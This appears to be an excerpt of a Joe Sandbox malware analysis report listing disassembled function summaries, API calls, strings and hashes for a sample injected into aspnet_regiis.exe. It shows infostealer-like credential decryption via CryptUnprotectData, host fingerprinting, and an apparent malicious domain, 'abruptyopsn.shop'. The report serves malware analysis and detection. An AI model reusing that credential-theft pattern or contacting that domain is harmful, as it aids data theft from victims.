Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3c525a1c2ed809f81cc66b8e4d4537864add6edf4ff6b78d606f48f13e59cb95
Instruction ID: a51f5dab65a9d841adcd3ebbf60ea8d50a404b25f3440285002a33c8f17219d4
Opcode Fuzzy Hash: 3c525a1c2ed809f81cc66b8e4d4537864add6edf4ff6b78d606f48f13e59cb95
Instruction Fuzzy Hash: B9112932B0C1012FDA116A755C88D6B23B99BD33BCB35022DF52493FD0DB7189395120

Function 6CE17EA6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CE17900,?,00000001,?,00000001,?,6CE16BE6,?,?,00000001), ref: 6CE17EBD
GetLastError.KERNEL32(?,6CE17900,?,00000001,?,00000001,?,6CE16BE6,?,?,00000001,?,00000001,?,6CE17132,6CE14FF3), ref: 6CE17EC9

Part of subcall function 6CE17E8F: CloseHandle.KERNEL32(FFFFFFFE,6CE17ED9,?,6CE17900,?,00000001,?,00000001,?,6CE16BE6,?,?,00000001,?,00000001), ref: 6CE17E9F

___initconout.LIBCMT ref: 6CE17ED9

Part of subcall function 6CE17E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CE17E80,6CE178ED,00000001,?,6CE16BE6,?,?,00000001,?), ref: 6CE17E64

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CE17900,?,00000001,?,00000001,?,6CE16BE6,?,?,00000001,?), ref: 6CE17EEE

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 69c996956157c2aa4655bc3989d877d820f843b51cf169969ff6af294f030339
Instruction ID: 0a2bb7cdb46cf1ec0a63128ff81cc61fb9ca4319abe2a289467f20f37df64d85
Opcode Fuzzy Hash: 69c996956157c2aa4655bc3989d877d820f843b51cf169969ff6af294f030339
Instruction Fuzzy Hash: 18F01C36654158BBCF121F92CD04ADE3FB6EB097A8B154018FA1885E21C7328C70DB90

Function 6CE12274 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6CE1227D

Part of subcall function 6CE12F43: HeapFree.KERNEL32(00000000,00000000,?,6CE1217C), ref: 6CE12F59
Part of subcall function 6CE12F43: GetLastError.KERNEL32(?,?,6CE1217C), ref: 6CE12F6B

_free.LIBCMT ref: 6CE12290
_free.LIBCMT ref: 6CE122A1
_free.LIBCMT ref: 6CE122B2

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 48bf10ea455b1ab5801002f25753651187c0ce755337a0e10fa81122cf2e5fad
Instruction ID: ea3d07a365e2d3d084773b01273b7fe0060604698a5c5cb41f89156c589ed08c
Opcode Fuzzy Hash: 48bf10ea455b1ab5801002f25753651187c0ce755337a0e10fa81122cf2e5fad
Instruction Fuzzy Hash: 7BE0BF71B382609A8E21BF2BE8054A77A71E76F644721804AE40562F20D7B516669FC5

Function 6CE0FA90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 6CE0FE34
___raise_securityfailure.LIBCMT ref: 6CE0FF1C

Strings

WVC, xrefs: 6CE0FEA7

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: WVC
API String ID: 3761405300-1100534715
Opcode ID: 300fe27b58fa5e8dc6199226cb4eb1d24217f02c388ac4a7b2bb8f4dcffa6958
Instruction ID: cbdc0624555612a8068ee9a4f9af24fb2761d3b2cae1b94132afaec08b931c46
Opcode Fuzzy Hash: 300fe27b58fa5e8dc6199226cb4eb1d24217f02c388ac4a7b2bb8f4dcffa6958
Instruction Fuzzy Hash: 9F21EDB6B60204DBEF00EF2BD1956623BB4BB0B714F60412AE5088B792E3B45595CF94

Function 6CE166F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CE165AF: EnterCriticalSection.KERNEL32(00000001,?,6CE16FEE,?,6CE1F400,00000010,6CE15107,00000000,00000000,?,?,?,?,6CE1514B,?,00000000), ref: 6CE165CA

FlushFileBuffers.KERNEL32(00000000,6CE1F3E0,0000000C,6CE167F7,dPl,?,00000001,?,6CE15064,?), ref: 6CE16739
GetLastError.KERNEL32 ref: 6CE1674A

Strings

dPl, xrefs: 6CE16771

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: dPl
API String ID: 4109680722-1338324705
Opcode ID: 514e630c6f51bcda2398813e1c375e223cff6d7496610423b8829b6aa63ec206
Instruction ID: ca130bd309629394b5a10d99e71cff63ddfc0c81b8d1c6f760b6b4d0c2ecf613
Opcode Fuzzy Hash: 514e630c6f51bcda2398813e1c375e223cff6d7496610423b8829b6aa63ec206
Instruction Fuzzy Hash: CE01B971A04314DFC7019FB8D94469D7BB4EF49728F20451EE411DBFD0D77498558B90

Function 6CE11E7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 6CE1432B: GetEnvironmentStringsW.KERNEL32 ref: 6CE14334
Part of subcall function 6CE1432B: _free.LIBCMT ref: 6CE14393
Part of subcall function 6CE1432B: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CE143A2

_free.LIBCMT ref: 6CE11EBD
_free.LIBCMT ref: 6CE11EC4

Strings

xC, xrefs: 6CE11E7D, 6CE11EB6

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: _free$EnvironmentStrings$Free
String ID: xC
API String ID: 2490078468-4061282587
Opcode ID: 0c57fde14651a3efad38accc7109efd3f6810897c38ccc21ededa0f1e7bd32a8
Instruction ID: c41fcc88b46f27345925ae08a5c2c170c9f2cb7c2c9767c18483533efb5be075
Opcode Fuzzy Hash: 0c57fde14651a3efad38accc7109efd3f6810897c38ccc21ededa0f1e7bd32a8
Instruction Fuzzy Hash: ABE06512E4D99005A62126AF6C4269A1A715BD733CB75039BD520DAFC1EB60C5260597

Function 6CE141A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 6CE141A8
GetCommandLineW.KERNEL32 ref: 6CE141B3

Strings

@", xrefs: 6CE141AE

Memory Dump Source

Source File: 00000000.00000002.1891406112.000000006CE01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE00000, based on PE: true

Associated: 00000000.00000002.1891390962.000000006CE00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891429764.000000006CE1A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891446413.000000006CE20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1891495909.000000006CE6D000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ce00000_ReploidReplic.jbxd

Similarity

API ID: CommandLine
String ID: @"
API String ID: 3253501508-3772326458
Opcode ID: 388bed80472ba4553cd83a7913e6e3a55a619737a9ecceb727c22fac93b4a8a1
Instruction ID: fdb36354545647f7d800cd6a05cf7d151f4d5287a3e76116522e39a85058908d
Opcode Fuzzy Hash: 388bed80472ba4553cd83a7913e6e3a55a619737a9ecceb727c22fac93b4a8a1
Instruction Fuzzy Hash: 79B04878B513008FCF00AF318089166BAB0F32A2123806057D80AC2A00E736106AAA50

Analysis Process: aspnet_regiis.exePID: 2492, Parent PID: 2312COMMON

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	20.2%
Total number of Nodes:	377
Total number of Limit Nodes:	29

Executed Functions

Function 008D8860 Relevance: 32.2, APIs: 11, Strings: 7, Instructions: 666
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(008E368C,00000000,00000001,008E367C), ref: 008D8AE7
SysAllocString.OLEAUT32(k2`0), ref: 008D8B60
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 008D8B9D
SysAllocString.OLEAUT32(07B705B3), ref: 008D8BEA
SysAllocString.OLEAUT32(09C50FBD), ref: 008D8CAD
VariantInit.OLEAUT32(EFEEEDF4), ref: 008D8D1C
VariantClear.OLEAUT32(?), ref: 008D8E8F
SysFreeString.OLEAUT32(?), ref: 008D8EB3
SysFreeString.OLEAUT32(?), ref: 008D8EB9
SysFreeString.OLEAUT32(00000000), ref: 008D8EC6
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 008D8EFA

Strings

]E, xrefs: 008D8C2C
b>c<, xrefs: 008D8AFD
]E, xrefs: 008D9062
x;, xrefs: 008D8C34
k2`0, xrefs: 008D8B5B, 008D8B5F
S, xrefs: 008D8C24
,./,, xrefs: 008D8947

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
API String ID: 2573436264-4038474941
Opcode ID: 1f34ff72e00063f77036d798f25a843def0576bdf1e67799a6d33057389dd70e
Instruction ID: 1b7e8765cf6946256e37e315025873e22184af81f41904914125e94c30f275ff
Opcode Fuzzy Hash: 1f34ff72e00063f77036d798f25a843def0576bdf1e67799a6d33057389dd70e
Instruction Fuzzy Hash: 2122DE766083419BD310DF28C885B6BBBE6FBC5314F188A2DE595DB3A0DB75D805CB82

Function 008B9362 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 390
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008DD910: LdrInitializeThunk.NTDLL(008E09B8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 008DD93E

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008B97EB

Strings

'>0=, xrefs: 008B952E
*8$), xrefs: 008B9523
x">*, xrefs: 008B9430
?7?0, xrefs: 008B950D
-&64, xrefs: 008B9544
D$p, xrefs: 008B95C2
e, xrefs: 008B955A
14'", xrefs: 008B9470
#1!%, xrefs: 008B9539

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: CryptDataInitializeThunkUnprotect
String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
API String ID: 279577407-4262920783
Opcode ID: ab58391b0fb36f82ea0310de028db119c5848fea4981bf3d3eab1a7a05da5d3c
Instruction ID: d0b3fce763171793a2e8215f1c9b7ef439670c40352e53d33e449eb93faa8a60
Opcode Fuzzy Hash: ab58391b0fb36f82ea0310de028db119c5848fea4981bf3d3eab1a7a05da5d3c
Instruction Fuzzy Hash: A0C1D772A083828BD728DF28C8916AFB7E2FBD5314F19892CD5D9C7352DB349805CB42

Function 008ADE48 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 338
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 008ADE54

Strings

wtf|, xrefs: 008ADF3B
abruptyopsn.shop, xrefs: 008AE2A0
LM, xrefs: 008AE23C
GK8m, xrefs: 008ADE73
T_RE, xrefs: 008ADF67
iped, xrefs: 008ADF46
.a]b, xrefs: 008AE07E

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: Uninitialize
String ID: .a]b$GK8m$LM$T_RE$abruptyopsn.shop$iped$wtf|
API String ID: 3861434553-1671141637
Opcode ID: 4281bb545b030d549c012c722cdf03f7c9ca683ef7ef14fb22ea460f829c1c42
Instruction ID: 7184fd3bb869c5c93402a01642e8e4dc01127b7f513b3a5839cc69a87f72eb50
Opcode Fuzzy Hash: 4281bb545b030d549c012c722cdf03f7c9ca683ef7ef14fb22ea460f829c1c42
Instruction Fuzzy Hash: 84B101756493C18BD3358F29C8903EFBBE1EBD7310F188D6DD4D98B242C67985068B92

Function 008C29CD Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1008
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

7x~, xrefs: 008C34C1

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: 7x~
API String ID: 0-3352779061
Opcode ID: 5363a8648350c30094f0c3fb1f48273ca1055e794095f9fcacd23892ee81a581
Instruction ID: e112df3b5acceaebd1a637a1fcc9d99b5efb8451f8f75f200ea6ceb29a658688
Opcode Fuzzy Hash: 5363a8648350c30094f0c3fb1f48273ca1055e794095f9fcacd23892ee81a581
Instruction Fuzzy Hash: FE723372A18245CFD718CF68EC81BAAB7B2FF85310F09856CE945AB395E734D901CB91

Function 008A8640 Relevance: 7.7, APIs: 5, Instructions: 220
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 008A8664
GetCurrentThreadId.KERNEL32 ref: 008A866E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 008A874C
GetForegroundWindow.USER32 ref: 008A8803
ExitProcess.KERNEL32 ref: 008A88E8

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: ea38a4e2b1e9e2f7d9344ab689f9d3c2ea29e901e0b49b318155174372e022e3
Instruction ID: 268f7485bf79e453347bdb3550feb238ac266d367e8aaa6e3212ff8f99b446f6
Opcode Fuzzy Hash: ea38a4e2b1e9e2f7d9344ab689f9d3c2ea29e901e0b49b318155174372e022e3
Instruction Fuzzy Hash: C3612B77B443084BE718AEACCC86356B7D2EB85710F1E813DA594DB392ED78DC009796

Function 008CBE8A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 008CC358

Strings

BVAI, xrefs: 008CC52A

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: dd19d0c541a30aa451e1a00a120193a31ffcd019f4f9e1d798e6036739af090a
Instruction ID: 5cb2d7ed32c1d7abae0459e0b968d55ece11fceeb37efb45074277ce707ca1bf
Opcode Fuzzy Hash: dd19d0c541a30aa451e1a00a120193a31ffcd019f4f9e1d798e6036739af090a
Instruction Fuzzy Hash: 45C1E27160C3908BC7298F2984507ABBFE1FF9A308F1849ADD4C9D7392D67989068B56

Function 008CC26C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 008CC358

Strings

BVAI, xrefs: 008CC52A

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: fbd5f6c424431466d963eb09140067c410e2828b141c7f3a5718f9cff34d5087
Instruction ID: 1972c5719cf7a29c0bb3143e5989ac0d68ccf7966471e7296fbb82aa9eaf715e
Opcode Fuzzy Hash: fbd5f6c424431466d963eb09140067c410e2828b141c7f3a5718f9cff34d5087
Instruction Fuzzy Hash: 72A1D27160C3908BC7298F2984507ABBFE1FF9A308F18496DD4CDD7392D77989068B5A

Function 008CC282 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 008CC358

Strings

BVAI, xrefs: 008CC52A

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: BVAI
API String ID: 3960555810-2651495128
Opcode ID: 43833d708a3ceb759400b2f49fbe8fa2e94a7f3cf5f4523cdc239a0c839a3d23
Instruction ID: 58d75d6f75d11b955dacf4f71d951ad2195ffeba70188114a36e045cd97bc5e5
Opcode Fuzzy Hash: 43833d708a3ceb759400b2f49fbe8fa2e94a7f3cf5f4523cdc239a0c839a3d23
Instruction Fuzzy Hash: 0CA1C17160C3908BC7298F2984507ABBFE1BF9A308F18496DD4CDD7392D77989068B5A

Function 008DD910 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(008E09B8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 008DD93E

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 008CB842 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 008CB875
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 008CB924

Strings

KHGN, xrefs: 008CB89B

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: KHGN
API String ID: 2904949787-1032087821
Opcode ID: 7744223dcdceb7e007014620750d255138bb2419730377818cb3cac8bb048847
Instruction ID: 26fbfd6bfa78566469a673976c36456c0caa07fe0235079c37b042f28f0f38bf
Opcode Fuzzy Hash: 7744223dcdceb7e007014620750d255138bb2419730377818cb3cac8bb048847
Instruction Fuzzy Hash: 8621D17010C6C58EDB258B35A8A1BFB7FE4EB9B344F18486DD0C9C7282CB35440A9B52

Function 008CB840 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?), ref: 008CB875
GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 008CB924

Strings

KHGN, xrefs: 008CB89B

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: ComputerFreeLibraryName
String ID: KHGN
API String ID: 2904949787-1032087821
Opcode ID: 5caa1ac9ab9b40e4fbad0f5745419bf5b99a4f41099e75f25dbfa760c02810af
Instruction ID: d158a2f8d18b23f4c1a3c5c9cda4134fde6c4db03ab11a51d1810a857801e16b
Opcode Fuzzy Hash: 5caa1ac9ab9b40e4fbad0f5745419bf5b99a4f41099e75f25dbfa760c02810af
Instruction Fuzzy Hash: BF11E3701486858FD7258F35E8A1BEB7FE8FB8B344F14482DD1CAC7291DB35480A9B52

Function 008CB94D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 008CBA54

Strings

bC, xrefs: 008CB992

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
